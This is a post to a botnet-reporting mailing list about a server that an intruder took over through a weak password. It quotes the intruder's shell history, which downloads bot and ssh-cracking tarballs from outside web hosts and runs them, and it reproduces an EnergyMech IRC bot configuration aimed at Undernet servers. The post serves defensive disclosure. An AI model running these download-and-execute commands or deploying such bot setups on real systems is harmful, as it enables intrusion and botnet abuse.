To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hi,
we've found one instance of bot from someone called Drow (tools were compiled but not stripped somewhere in /home/drow ... ;))). Probably a spanish speaking person. Undernet admins should take a look down below and check their servers. if there are listening here .. access was gained by very very weak password, and standard procedure comes, download bot, ssh cracker, spam tool ... was a kiddie, comes from 89.123.217.233, no with no cleanup and probably a manual job .. ---- cut history ---- passwd ps x cd /tmp w ps x cd /tmp wget freewebs.com/staycu/stayku.tar tar xzvf stayku.tar cd .staycu ./linux cat /proc/cpuinfo cd /var/tmp/delles cd /var/tmp wget http://www.geocities.com/demonfire_16/delles.tar.gz tar xzvf delles.tar.gz cd delles ./a 200.62 nohup ./start 59 >> /dev/null & cd /var/tmp/delles cat vuln.txt ps x cd /var/tmp/delles cat vuln.txt ps x cd /var/tmp/delles cat vuln.txt ... ... ---- cut history ---- bodik ---- cut ---- # Boqdan`S EnergyMech configuration file # v2.9.3 - Boqdan ##### Linking ##### #ENTITY emech #LINKPASS abc123 #LINKPORT 49152 #LINK hismech a1b2c3 mech.host.net 49152 #LINK hermech abcdefg 0 0 AUTOLINK ##### Server List #### SERVER diemen.nl.eu.undernet.org 6660 SERVER diemen.nl.eu.undernet.org 6667 SERVER diemen.nl.eu.undernet.org 6669 SERVER lelystad.nl.eu.undernet.org 6666 SERVER lelystad.nl.eu.undernet.org 6667 SERVER lelystad.nl.eu.undernet.org 6668 SERVER london2.uk.eu.undernet.org 6660 SERVER london2.uk.eu.undernet.org 6669 SERVER london2.uk.eu.undernet.org 7000 SERVER graz.at.eu.undernet.org 6660 SERVER graz.at.eu.undernet.org 6670 SERVER graz.at.eu.undernet.org 7000 SERVER helsinki.fi.eu.undernet.org 6666 SERVER helsinki.fi.eu.undernet.org 6669 SERVER helsinki.fi.eu.undernet.org 7000 SERVER montreal.qc.ca.undernet.org 6665 SERVER montreal.qc.ca.undernet.rog 6669 SERVER montreal.qc.ca.undernet.org 7000 SERVER oslo2.no.eu.undernet.org 6660 SERVER oslo2.no.eu.undernet.org 6669 SERVER oslo2.no.eu.undernet.org 7000 # SERVER 1.2.3.4 6667 ThisIsMyPassword # SERVER 192.168.100.1 6669 moo:eu.undernet.org:6667 ##### Bot 1 Configuration ##### NICK Boqdan USERFILE 1 CMDCHAR - LOGIN gat IRCNAME tundd MODES +ix-ws #VIRTUAL #NOSEEN HASONOTICE 1 # Yes for Undernet. TOG CC 1 # We want the bot to require command character TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. TOG SPY 1 # Tell who is executing what in the partyline. SET OPMODES 6 # How many modes in a line? 6 on undernet... SET BANMODES 6 # How many bans in a line? 6 on undernet... SET CTIMEOUT 60 # Server connection timeout SET CDELAY 30 # Delay between connection attempts CHANNEL #staycu.com # Channel name TOG PUB 1 # Allow public(in-channel) commands? Yes. TOG MASS 1 # Do mass-mode/kick/ban checks... TOG SHIT 1 # Activate the shitlist for this channel TOG PROT 1 # Activate protection of users TOG ENFM 0 # Dont enforce channel modes. SET MDL 5 # How many -o before killing the guy? SET MKL 5 # How many kicks? SET MBL 5 # And how many Bans? SET MPL 1 # What to do with massmoders? # 0 = nothing, # 1 = kick the bastard, # 2 = kickban 'em, # 3 = kickban & shitlist them. ##### END BOT 1 ##### ##### Bot 2 Configuration ##### NICK Guapo USERFILE 1 CMDCHAR - LOGIN lmess IRCNAME mesaju MODES +ix-ws #VIRtual #NOSEEN HASONOTICE 1 # Yes for Undernet. TOG CC 1 # We want the bot to require command character TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. TOG SPY 1 # Tell who is executing what in the partyline. SET OPMODES 6 # How many modes in a line? 6 on undernet... SET BANMODES 6 # How many bans in a line? 6 on undernet... SET CTIMEOUT 60 # Server connection timeout SET CDELAY 30 # Delay between connection attempts CHANNEL #staycu.com # Channel name TOG PUB 1 # Allow public(in-channel) commands? Yes. TOG MASS 1 # Do mass-mode/kick/ban checks... TOG SHIT 1 # Activate the shitlist for this channel TOG PROT 1 # Activate protection of users TOG ENFM 0 # Dont enforce channel modes. SET MDL 5 # How many -o before killing the guy? SET MKL 5 # How many kicks? SET MBL 5 # And how many Bans? SET MPL 1 # What to do with massmoders? # 0 = nothing, # 1 = kick the bastard, # 2 = kickban 'em, # 3 = kickban & shitlist them. ##### END BOT 2 ##### ##### Bot 3 Configuration ##### NICK Bogdy USERFILE 1 CMDCHAR - LOGIN Lucru IRCNAME LeLa MODES +ix-ws #VIRTUAL #NOSEEN HASONOTICE 1 # Yes for Undernet. TOG CC 1 # We want the bot to require command character TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. TOG SPY 1 # Tell who is executing what in the partyline. SET OPMODES 6 # How many modes in a line? 6 on undernet... SET BANMODES 6 # How many bans in a line? 6 on undernet... SET CTIMEOUT 60 # Server connection timeout SET CDELAY 30 # Delay between connection attempts CHANNEL #staycu.com # Channel name TOG PUB 1 # Allow public(in-channel) commands? Yes. TOG MASS 1 # Do mass-mode/kick/ban checks... TOG SHIT 1 # Activate the shitlist for this channel TOG PROT 1 # Activate protection of users TOG ENFM 0 # Dont enforce channel modes. SET MDL 5 # How many -o before killing the guy? SET MKL 5 # How many kicks? SET MBL 5 # And how many Bans? SET MPL 1 # What to do with massmoders? # 0 = nothing, # 1 = kick the bastard, # 2 = kickban 'em, # 3 = kickban & shitlist them. ##### END BOT 3 ##### ---- cut ---- _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
